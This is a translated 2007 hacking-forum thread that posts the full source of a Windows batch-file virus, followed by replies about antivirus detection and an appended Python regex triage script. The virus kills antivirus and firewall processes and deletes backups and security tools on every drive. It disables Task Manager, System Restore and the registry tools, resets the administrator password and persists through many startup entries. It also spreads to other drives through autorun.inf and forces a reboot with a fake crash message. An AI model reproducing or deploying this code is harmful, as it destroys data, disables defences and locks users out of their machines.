
[Virus sample] [Repost][Hacker Base] Super batch-file virus

起点
Posted on 2007-1-26 19:58:13
  1. [Repost] Super batch-file virus

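  2. There is very little batch-file virus code online, so I'm posting a batch file I wrote for everyone to study..... My skills are poor and this is about all I can write, so please bear with me...... I'd also ask the moderators to mark this thread as featured...
  3. Enough chatter... have a look at the code... for research only... don't do anything bad with it...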
  4. @echo off
  5. title You DEAD!!!!!!!
  6. set taskkill=s
  7. copy %0 %windir%\system32\cmd.bat
  8. attrib %windir%\system32\cmd.bat +r +s +h
  9. net stop sharedaccess >nul
  10. %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
  11. %s% /im norton* /f >nul
  12. %s% /im av* /f >nul
  13. %s% /im fire* /f >nul
  14. %s% /im anti* /f >nul
  15. %s% /im spy* /f >nul
  16. %s% /im bullguard /f >nul
  17. %s% /im PersFw /f >nul
  18. %s% /im KAV* /f >nul
  19. %s% /im ZONEALARM /f >nul
  20. %s% /im SAFEWEB /f >nul
  21. %s% /im OUTPOST /f >nul
  22. %s% /im nv* /f >nul
  23. %s% /im nav* /f >nul
  24. %s% /im F-* /f >nul
  25. %s% /im ESAFE /f >nul
  26. %s% /im cle /f >nul
  27. %s% /im BLACKICE /f >nul
  28. %s% /im def* /f >nul
  29. %s% /im 360safe.exe /f >nul
  30. net stop Shadow" "System" "Service
  31. set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
  32. for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
  33. for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
  34. rem Modify the registry.......
  35. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
  36. CheckedValue /t REG_DWORD /d 00000000 /f >nul
  37. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
  38. 00000001 /f >nul
  39. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
  40. REG_DWORD /d 00000001 /f >nul
  41. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
  42. 4294967295 /f >nul
  43. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
  44. REG_DWORD /d 00000002 /f >nul
  45. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
  46. 00000001 /f >nul
  47. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
  48. 00000001 /f >nul
  49. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
  50. 00000001 /f >nul
  51. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
  52. 00000001 /f >nul
  53. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
  54. /d 00000001 /f >nul
  55. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
  56. 00000001 /f >nul
  57. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
  58. /d 00000001 /f >nul
  59. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
  60. 00000001 /f >nul
  61. REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
  62. 00000001 /f >nul
  63. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
  64. 00000001 /f >nul
  65. cls
  66. net user administrator 123456 >nul
  67. for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
  68. echo @echo off >d:\setup.bat
  69. echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新安装系统可以解决此问题
  70. !^.^ >>d:\setup.bat
  71. echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat >>d:\setup.bat
  72. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  73. /f >>d:\setup.bat
  74. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  75. /f >>d:\setup.bat
  76. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
  77. /f >>d:\setup.bat
  78. HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
  79. echo [windows] >> %windir%\win.ini
  80. echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
  81. echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
  82. echo [boot] >> %windir%\system.ini
  83. echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
  84. echo [AutoRun] >d:\autorun.inf
  85. echo Open=setup.bat >>d:\autorun.inf
  86. echo Open=system.bat >>d:\autorun.inf
  87. attrib d:\autorun.inf +r +s +h >>d:\setup.bat
  88. attrib d:\setup.bat +r +s +h >>d:\setup.bat
  89. start d:\setup.bat /min >nul
  90. echo @echo off >>C:\AUTOEXEC.BAT
  91. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  92. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  93. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  94. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  95. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
  96. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  97. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  98. /f >>C:\AUTOEXEC.BAT
  99. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  100. /f >>C:\AUTOEXEC.BAT
  101. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
  102. /f >>C:\AUTOEXEC.BAT
  103. echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
  104. copy %0 %systemroot%\windows.bat >nul
  105. if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
  106. if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
  107. if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
  108. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  109. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
  110. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  111. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
  112. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  113. /f >>%windir%/system32/explorer.bat
  114. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  115. /f >>%windir%/system32/explorer.bat
  116. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
  117. windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
  118. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
  119. windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
  120. echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
  121. attrib %windir%/system32/explorer.bat +r +s +h%
  122. attrib %systemroot%/windows.bat +r +s +h
  123. for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
  124. for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
  125. for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
  126. set drive=e f g h i j k l m n o p q r s t u v w x y z
  127. for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
  128. for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
  129. copy %0 d:\Program" "Files\run.bat
  130. for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
  131. >>%%c:\system.bat
  132. for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
  133. for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
  134. for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
  135. if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
  136. attrib d:\Program" "Files\run.bat +r +s +h >nul
  137. del %0
  138. exit
  139. I won't go through what it all means, it's too long. Anyone with some batch-file basics should be able to follow it.

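  140. I did check it, but with something this long mistakes are inevitable. If I got something wrong, I'd appreciate pointers from the experts..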

  141. Please credit the source when reposting! Hacker Base
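For the script posted above, a static triage pass can show which behaviour classes it contains without running it. This is an added example, not part of the original post; the rule names, the threshold and the `SAMPLE`/`BENIGN` inputs are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# (tag, pattern) pairs derived from commands visible in the posted script.
# Patterns key on arguments rather than command names, because the script
# invokes its process killer through a variable (%s%), not by name.
RULES = [
    ("terminate-process",   r"/im\s+\S.*\s/f\b"),
    ("stop-service",        r"\bnet\s+stop\b"),
    ("change-password",     r"\bnet\s+user\s+\S+\s+\S+"),
    ("policy-lockdown",     r"\\Policies\\(?:Explorer|System)\s+/v\s+\w+"),
    ("disable-restore",     r"SystemRestore\s+/v\s+Disable(?:SR|Config)\b"),
    ("run-key-persistence", r"\\CurrentVersion\\Run(?:Once)?\s+/v\b"),
    ("autorun-inf",         r"\bautorun\.inf\b"),
    ("hide-file",           r"\battrib\b.*\+s\s+\+h\b"),
    ("delete-backups",      r"\bdel\s+\S*\*\.gho\b"),
    ("self-delete",         r"\bdel\s+%0(?:\s|$)"),
]
COMPILED = [(tag, re.compile(p, re.IGNORECASE)) for tag, p in RULES]

def triage(script_text):
    """Return {tag: [1-based line numbers]} for every rule that matches."""
    hits = defaultdict(list)
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        for tag, rx in COMPILED:
            if rx.search(line):
                hits[tag].append(lineno)
    return dict(hits)

def verdict(hits, threshold=4):
    """Flag a script that combines several distinct behaviour classes."""
    return "suspicious" if len(hits) >= threshold else "inconclusive"

# Constructed sample: one line per behaviour, modelled on the post above.
SAMPLE = r"""@echo off
%s% /im av* /f >nul
net stop sharedaccess >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f
echo [AutoRun] >d:\autorun.inf
attrib d:\autorun.inf +r +s +h
del %0
"""
# Constructed benign batch file for comparison.
BENIGN = "@echo off\nxcopy C:\\data D:\\backup /s /y\necho done\n"

if __name__ == "__main__":
    print(triage(SAMPLE), verdict(triage(SAMPLE)))
```

The rules match one command per line, so text copied from a page with wrapped or numbered lines has to be restored to one command per line first.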
dwjfeiren
Posted on 2007-1-26 20:06:28
Thanks for sharing, OP
waterou
Posted on 2007-1-26 20:16:09
So what does this actually do? I'm a newbie and can't follow it..
Paxson
Posted on 2007-1-26 20:16:44
Heh, Kaspersky should have self-protection, right? Would this even work?
qianwenxiang
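Posted on 2007-1-26 20:23:01
The processes the batch file kills aren't even antivirus processes, are they? Why kill 天网 (SkyNet)? As far as I know 天网 doesn't monitor files. It adds so many startup entries and copies so many files too. Quite a nasty batch file.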
dwjfeiren
Posted on 2007-1-26 20:39:02
OP, I only saved the full text of your post into a text file and Dr.Web killed it

cxcx3
Posted on 2007-1-26 21:03:54
Looks like Dr.Web's "probably" detection is still pretty strong
waterou
Posted on 2007-1-26 21:25:42
Kaspersky doesn't react at all, even with a targeted scan..
起点
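OP | Posted on 2007-1-26 21:38:23
Originally posted by dwjfeiren on 2007-1-26 20:39
OP, I only saved the full text of your post into a text file and Dr.Web killed it

Dr.Web's monitoring is pretty extreme
You can take a look at the previous bat virus I posted; 驱逐舰 flagged it as soon as the web page was opened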
moonsilver
Posted on 2007-1-26 22:05:59
Saw this a long time ago